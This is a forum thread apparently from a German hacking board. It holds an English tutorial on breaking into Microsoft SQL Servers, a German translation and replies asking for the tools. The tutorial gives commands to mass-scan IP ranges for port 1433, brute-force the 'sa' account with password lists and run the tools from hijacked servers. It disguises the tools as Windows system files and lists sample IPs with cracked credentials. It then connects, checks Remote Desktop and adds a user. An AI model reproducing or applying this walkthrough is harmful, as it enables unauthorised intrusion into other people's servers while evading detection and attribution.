Dieses Tutorial habe ich für h4ck-y0u geschrieben gehabt, möchte es euch aber nicht vorenthalten.

Hi,
some guys PM'ed me that thy wanna have a good basic tutorial in SQL Server Hacking without any "Injection" !


So here it is :

Cahpter 0: Basics
Chapter 1: Find vulnerable Server
Cahpter 2: Brute the vulnerable Server
Chapter 3: Check the Results
Chapter 4: Hack the Servers
Chapter 5: Break Security Rules


Uses Toolz: Modded DFind , Modded SQLck , Modded mexP , mssqlchecker.exe , Modded fPort , hidden32 , Modded KillZ , Servu-U UD , (RATmin) , Moddet SQLexec III , 1.013 , Simple SQL Browser , Bulletproof FTP Server , Pumpkin TFTP , FlashFXP , Auto-Hacker by Z3r00l / dermoeter

All this tools are in a link above this tutorial! PLS dont share them 2 much .... just h4ck-y0u base!




Chapter 0:

First some Basics to MSSQL Hacking. This type of Server is runnung on Port 1433. The basic User Account is "sa".
There are thounds of damn fucking n00b admins out there. They leave the "sa" password blank or "12345" "sa" etc.
The advantage of hacking MSSQL is that you can use all your well knows cmd commands. net stop , net start , net user , etc
Lets start:





Chapter 1:

Find vulnerable Server - Okay Guyz lets start. First we need some IP's with MSSQL running. MSSQL is runnung on port 1433.
Extract the Tool DFind.exe or if you have a remote Server with full rights use dfindold.exe cause its most time UD by AVS.
Then you have to choose a good IP-Range wich you wanna scan for MSSQL. But PLEASE ! Make a Whois to some IP's first. Dont scan honeypots or in your own country ! I use http://www.iks-jena.de/cgi-bin/whois.pl tho whois IP with country results.
If you are intrested in some special country use http://www.ipaddresslocation.org/ip_ranges/get_ranges.php to show wich ranges are in the selected country. Now back 2 real work.

Example 1 - Scan on local Computer.

When you have extracted the DFind.exe to local PC cd to your directory.
cmd.exe > cd c:\scanner\dfind\ ( example )
Then run DFind.exe with these Parameters:

DFind.exe -p 1433 startrange endrange ( example : 207.261.0.0 207.280.255.254 )

Now there is a .txt file called dfind.txt . Init there are all the foundet IP with an open 1433 port.
Wait a day or just some hours, depending on the range size.

Example 2 - scan on a remote Stro/Server

A hacked SQL with FXPable server is called "Stro" and it comes from the fxp scene. This running FTP-Server allowed to extract various code wich is compatibel to win32 code. A remote Server with Remote Desktop or full rights can also be used but you hoster will kick you in a few hours ^^.
Just upload your hidden32.exe dfind.exe to your remote and change to the directory.
Depending on the remote server use this commans

FXP-Server :site exec hidden32.exe dfind.exe -p 1433 rangestart rangeend ( example : 207.261.0.0 207.280.255.254 ).
0815-Remote :dfind.exe -p 1433 rangestart rangeend ( example : 207.261.0.0 207.280.255.254 ).

You can find the dfind.txt in the same directory like ur .exe
Wait a day or just some hours, depending on the range size.


There are a few other command line sql scanner. sql 100 500 1000 , sqllhf blabla i hate them all!



Chapter 2:

Brute the results shown in dfind.txt

Example 1 - Brute on local Computer.

Extract the tools /moded Bruter/ and SQlck.exe. Copy the dfind.txt in the same directory! There are other options but this works 100%. SQLcl.exe is an password auditing tool also called as bruter. Cause were just bruting "sa" in my exmamples you need only a pw.txt file. In my pack there are 2 diffent. A "small" version and a 15mb version. First use the small edition there easy crackable server are not so hard protected like the other :P
Then run SQLck.exe with these Parameters:

SQlck.exe -p PW.txt -i dfind.txt -o result.txt -t 200

-p = Password File
-i = Scan Result File
-o = Output File.
-t = Threats

Depending on your connection incremenet the -t option.
Now let them crack. If the size of results.txt grows feel lucky, there are some cracked sql's.

It's possible that you have not enough RAM to use SQLck.exe
Then read Example 3 !....
I've over 100 Hacked Stros. The cracking power is unbelievably!
My Intel Xenon 3800 with 8GB Ram and a fiber-optic network needs to crack a 1MB dfind file with 1000 threads more than 3 days! So dont be afraid if there are not to much results in the first hours.



Example 2 - Brute on remote Stro/Server.

Same thinks like in chapter 1 Example 2.

Upload /modded Bruter/ SQLck.exe hidden32.exe and PW.txt to your server. Copy the dfind.txt to your sqlck.exe dir!
Depending on the remote server use this commans


FXP-Server : site exec hidden32.exe SQlck.exe -p PW.txt -i dfind.txt -o result.txt -t 200
0815-Remote : SQlck.exe -p PW.txt -i dfind.txt -o result.txt -t 200

If the Server hang up dont worry. Just a big start lag.


Example 3 - When SQLck.exe hangs up.

Okay then change to your /modded Bruter/ dir.
There are 3 different files. Legend:

Sqlck.exe -> rundll32.dll
password.txt -> mspoolservice.dll
SQLck_Logfile.txt -> Systemservice.ocx
result.txt -> winlogon.dll
hidden.exe -> system32.dll


Usage1: rundll32.dll -p mspoolservice-xxl.dll -i scan.txt -r sa -o winlogon.dll -t 200
Usage2: site exec system32.dll rundll32.dll -p mspoolservice-xxl.dll -i scan.txt -r sa -o winlogon.dll -t 99999

This tool is not modded by me! The respect goes to the real writer pls!





Chapter 3 - Check the Results



Yeah now lets check the bruted results!
Open your results.txt or winlogon.dll(open with notepad).

This could be a result:

202.76.235.51:1433 [sa:123456] Time:422 msec
202.80.173.17:1433 [sa:sa] Time:313 msec <----lowest time / fastest server
202.75.223.141:1433 [sa:!@#$%^&*()] Time:453 msec
202.82.116.202:1433 [sa:sa] Time:328 msec
202.83.41.166:1433 [sa:] Time:360 msec
202.82.39.244:1433 [sa:password] Time:313 msec
202.85.51.12:1433 [sa:password] Time:312 msec
202.85.169.95:1433 [sa:123] Time:344 msec
202.86.128.229:1433 [sa:] Time:672 msec
202.87.47.27:1433 [sa:] Time:3250 msec
202.88.128.108:1433 [sa:] Time:1593 msec
202.88.128.190:1433 [sa:] Time:640 msec


IP USER:PASS and the React Time. First check the IP's with the lowest React time!!!
Now open sqlexec2.exe. Just click "later"
Insert the IP in the Host field. Then insert username and password and klick on connect!

A worked connection is like this:
SQL>Connecting 202.97.181.61.
SQL>Connected to 202.97.181.61.

A bad connection is like this:
SQL>Connecting 202.97.181.61.
SQL>Could not connect to 202.97.181.61.
SQL>Disconnected.

This yould happend cause of wrong typed password or since the cracking the server password was changed =(

On a woking connection type in command linke : dir c:\

There are also differnt results.

The good one is the list of files and folders on your server.
All the other results are explained in chapter 5!



Chapter 4 - Hack the Servers

Now the intresting things. If you found a cracked results with listed files and folders FIRST run on your PC

Example 1 - Check Remote Desktop Connection

run > mstsc.exe
Type in the SAME IP from your SQL Server.
If you can connect and see the remote desktop....damn your in!
Create your own user:

p.s. JA Copyright liegt bei mir! dermoeter aka Z3r0c00l

wer sich gerne wirklich damit beschätigen möchte bekommt den rapidshare link für restliche proggs per PN.

Das sieht ja mal ziemlich nice aus, hab schon was gesucht für etwas wo wohl keine sqli möglich ist. (für mehr sachen bin ich gern offen :D)
Nice work :)

Razzorhead

so ein tut hab ich schon immer gesucht, wirklich klasse geschrieben.

ich war vor jahren mal scanner in der xdcc szene und habe nach sql server für bots gescannt, leider konnte ich die scanergebnisse immer nur weiterreichen,
würde gern mehr darüber erfahren wie sql zb gesichert werden etc.

würde mich über weitere tuts etc freuen, gerne auch per pm

gruss
sNAKOR

auch von mir: sehr schönes tut
beschäftige mich atm auch damit, und würd mich auch sehr freuen wenn ich den prog link per pn kriegen würd

hab dir auch schon ne pn geschickt^^

danke, werds mal testen.

spitzen TUT 8)

CHapter0: Basics
Chapter1: Unsicheren Server finden
Chapter2: Unsicheren Serber bruten
Chapter3: Ergebnisse kontrollieren
Chapter4: Server hacken
Chapter5: Sicherheits Regeln brechen

Genutzte Toolz:
Modded DFind
Modded SQLck
Modded mexP ,
mssqlchecker.exe
Modded fPort
hidden32
Modded KillZ
Servu-U UD
(RATmin)
Moddet SQLexec III
1.013
Simple SQL Browser
Bulletproof FTP Server
Pumpkin TFTP
FlashFXP
Auto-Hacker by Z3r00l / dermoeter
++++++++++++++++++++++++++++++++++++++++++++++++++ +++

Alle diese Tools sind in einem link über dem tutorial,bitte
verbreitet sie nicht zu sehr...

Chapter 0:
Zuerst einige Basics zum MSSQL hacking.Diese Art von Servern
läuft über den Port 1443. Der Standart Benutzer Account ist "sa" .
Es gibt tausende von admins da draussen,welche das "sa" passwort leer lassen,oder
einfache passwörter wie z.B. "12345" ; "sa" oder ähnliche nutzen.
Der Vorteil beim MSSQL Hacking ist folgender: Du kannst deine bekannten
cmd commands nutzen,wie z.B. net stop , net start, net user usw.

Chapter 1:
Ungeschützten Server finden - Okay Leute , lasst uns anfangen.Zuerst brauchen wir
einige IP's die mit MSSQL laufen.MSSQL läuft wie gesagt auf port 1433.
Extrahiert das Tool DFind.exe oder wenn du einen remote Server mit Admin rechten hast
benutze dfindold.exe weil es weniger AV detectet ist.
Nun müsst ihr einen guten IP Range wählen,den du auf MSSQL scannen willst.aber BITTE! Macht vorher eine "WhoIS"
mit manchen IP's.Scannt keine "honeypots"oder in deinem eigenen Land!Ich benutze http://www.iks-jena.de/cgi-bin/whois.pl
Wenn du interessiert an manchen speziellen ländern bist,benutze
http://www.ipaddresslocation.org/ip_ranges/get_ranges.php
um ranges aus dem ausgewählten land anzuzeigen.
Nun zur richtigen Arbeit.

beispiel 1 - Scan auf dem lokalen PC
Wenn du die DFind.exe auf deinem pc extrahiert hast,wechsel per cmd in das verzeichnis ("cd")
cmd.exe -> cd c:\scanner\dfind\ (beispiel)
Nun DFind.exe ausführen mit diesen Parametern:

DFind.exe -p 1433 startrange endrange ( example : 207.261.0.0 207.280.255.254 )

Nun ist dort eine .txt Datei mit dem Namen "dfind.txt",enthalten sind alle gefundenen
IP's mit einem offenen Port 1433.
Wartet ein paar stunden oder einen tag,je nach Range Größe

Beispiel 2 - Scan auf remote Server

Ein gehackter SQL server der FXP fähig ist wird "Stro" genannt , dies kommt aus der fxp szene
Dieser laufende FTP Server erlaubt es alle möglichen codes zu extrahieren,welcher mit win32 zu kombinieren ist.

Ein remote Server mit Remote Desktop oder Admin rechten , kann auch genutzt werden,aber euer hoster wird euch in
ein paar Stunden kicken.
Uploadet eure hidden32.exe dfind.exe auf eueren Remote und wechselt in das verzeichnis
Je nach remote server nutz diese commands:

FXP-Server :site exec hidden32.exe dfind.exe -p 1433 rangestart rangeend ( example : 207.261.0.0 207.280.255.254 ).
0815-Remote :dfind.exe -p 1433 rangestart rangeend ( example : 207.261.0.0 207.280.255.254 ).

Du kannst die dfind.txt in dem gleichen Verzeichnis wie deine .exe finden.
Wartet ein paar stunden,oder einen Tag,abhängig von der Ragne Größe.

Es gibt ein paar andere command zeilen sql scanner. sql 100 500 1000, swllhf
blabla ich hasse sie alle

Chapter 2:

Brite die Ergebnisse in der dfind.txt

Beispiel 1 - Bruten auf dem lokalen rechner

Extrahiere die Tools "Moded Bruter nd SQLck.exe" Kopiere die
dfind.txt in das gleiche Verzeichnis.Es gibt andere Optionen , aber es funktioniert 100%ig. sQLcl.exe ist ein
Passwort prüf Tool,auch bruter genannt.Weil wir in den Beispielen nur den "sa" bruten brauchst du nur eine "pw.txt" datei.
In meinem Paket gibt es 2 verschiedene,Eine kleine version,und eine 15mb große.Verwendet zuerst die kleine version,da leicht zu crackende
Serber nicht so stark geschützt sind wie andere :P
Dann startet die SQLck.exe mit diesen Parametern:

-p = Password File
-i = Scan Result File
-o = Output File.
-t = Threats

Abhängig von deiner verbindunsrate , die -t option.
Nun lasst ihn Cracken.Wenn die Größe der "results.txt" gut wächst,sind
einige gecrackte sql's vorhanden.

Es ist möglich das du nicht genug RAM hast um die SQLck.exe zu benutzen.
Dann liest Beispiel 3.
ich habe über 100 Stros gehackt,die crack wirkng ist unglaublich!
Mein intel Xenon 3800 mit 8GB RAM nd fiber optic netzwerk braucht mehr als 3 tage um eine 1mb dfind
datei zu cracken!
Also wundert euch nicht,wenn es kaum ergebnisse in den ersten stunden gibt.

Beispiel 2 - Bruten auf einem Remote Stro/Server

Die selben sachen wie in chapter 1,Beispiel 2

Uploadet modded Bruter, die SQLcl.exe, hidden.exe und die pw.txt auf euren Server.Kopiere die
dfind.txt in deine sqlck.exe!
Abhängig von dem remote server,benutze diese commands

FXP-Server : site exec hidden32.exe SQlck.exe -p PW.txt -i dfind.txt -o result.txt -t 200
0815-Remote : SQlck.exe -p PW.txt -i dfind.txt -o result.txt -t 20

Wenn der Server sich aufhängt,keine Angst.Nur ein Großer Start Lag

Beispiel 3 - Wenn die SQLck.exe sich aufhängt

Wenn das passiert,geht in das modded bruter verzeichnis.
Dort sind 3 verschiedene Dateien.

Sqlck.exe -> rundll32.dll
password.txt -> mspoolservice.dll
SQLck_Logfile.txt -> Systemservice.ocx
result.txt -> winlogon.dll
hidden.exe -> system32.dll

Nutzung 1: rundll32.dll -p mspoolservice-xxl.dll -i scan.txt -r sa -o winlogon.dll -t 200

Nutzung 2: undll32.dll -p mspoolservice-xxl.dll -i scan.txt -r sa -o winlogon.dll -t 200

Dieses tool wurde von mir gemodded,der Respekt geht an den echten Coder!



Chapter 3 - Ergebnisse kontrollieren

lasst uns die gebruteten Ergebnisse checken!
öffne deine results.txt oder die winlogon.dll (mit dem notepad).

So könnte ein ergebnis aussehen:

202.76.235.51:1433 [sa:123456] Time:422 msec
202.80.173.17:1433 [sa:sa] Time:313 msec <----lowest time / fastest server
202.75.223.141:1433 [sa:!@#$%^&*()] Time:453 msec
202.82.116.202:1433 [sa:sa] Time:328 msec
202.83.41.166:1433 [sa:] Time:360 msec
202.82.39.244:1433 [sa:password] Time:313 msec
202.85.51.12:1433 [sa:password] Time:312 msec
202.85.169.95:1433 [sa:123] Time:344 msec
202.86.128.229:1433 [sa:] Time:672 msec
202.87.47.27:1433 [sa:] Time:3250 msec
202.88.128.108:1433 [sa:] Time:1593 msec
202.88.128.190:1433 [sa:] Time:640 msec

IP USER:PASS und die reaktionszeit.
Zuerst checkt die IP's mit der geringsten Reaktionszeit
nun öffnet die sqlexec2.exe. Klickt einfach "later"
Fügt die IP in das Host Feld.Dann fügt username und passwort ein
und klickt auf "connect"


Eine funktioniernde verbindung sieht so aus:
SQL>Connecting 202.97.181.61.
SQL>Connected to 202.97.181.61.

Eine nicht funktionierende Verbindung sieht so aus:
SQL>Connecting 202.97.181.61.
SQL>Could not connect to 202.97.181.61.
SQL>Disconnected.

Das kann passieren,wenn ein passwort falsch geschrieben wurde oder seit
dem cracken geändert wurde.

Auf einem funktionierendem Server tippe ein command ein wie "dir c:\"

Dort gibt es verschiedene Ergebnisse.

Das Gute ist die liste der dateien und ordner auf deinem Server.
Alle anderen Erebnisse sind in chapter 5 erklärt



Chapter 4 - Die Server hacken

Nun die interessanten sachen.Wenn du ein gecracktest Ergebnis
mit aufgelistetem Dateien und Ordnern , lasst es zuerst auf eurem pc laufen!

Beispiel 1 - Remote Desktop Verbindung kontrollieren
ausführen -> mstsc.exe
Füge die GLEICHE ip von deinem SQL Serber ein
Wenn du vebinden kannst,hast du es geschafft.
Erstelle deinen eigenen User.

Copyright by demoeter aka Z3roc00l
Übersetzt von Gumball




----------------------------------------------------------------


Mein beitrag dazu,mal das anze auf Deutsch...

hmmm ein video tutorial besser :S ich habe ganz venig kapiert :S plzz ein vid-tut

ja, ich muss sagen es ist ein echt klasse tut, aber warum haste das nich in die Tut-Section gepostet??

Ich reporte es mal, damit die MOD's das verschieben ;=)

Nice tutorial hast ne PN ;)

wo bekomme ich die tools her also dfind usw

Google hilft
Ansonsten schau dich mal hier http://board.raidrush.ws/ oder hier http://heapoverflow.com/f0rums/ um ;)

wie isn das eigentlich: is scannen erlaubt oder nicht?
weil einer den ich kenne meint dass das erlaubt is nur eben den providern ein dorn im auge.
stimmt das? wenn ja dann muss man ja den whois eig auch erst bei den ergebnissen machen oder?

Kann mir jemand die Proggz die in diesem Tutorial genutzt wurden per PM zuschicken PLZ.
Gerne auch per mail : padisha@secure-mail.biz

Dieser thread ist sehr alt, vielleicht ist jemand noch aktuel mit den Progz am start.

Danke
Joyicool

Ich weis, der Thread ist schon sehr alt, aber hat vielleicht noch jemand diese Tools?
oder ähnliche?

Danke im voraus

Hey ,

Du kannst Metasploit verwenden ..

Sqlck kann ich dir laufe es. Tages uppen

Regards .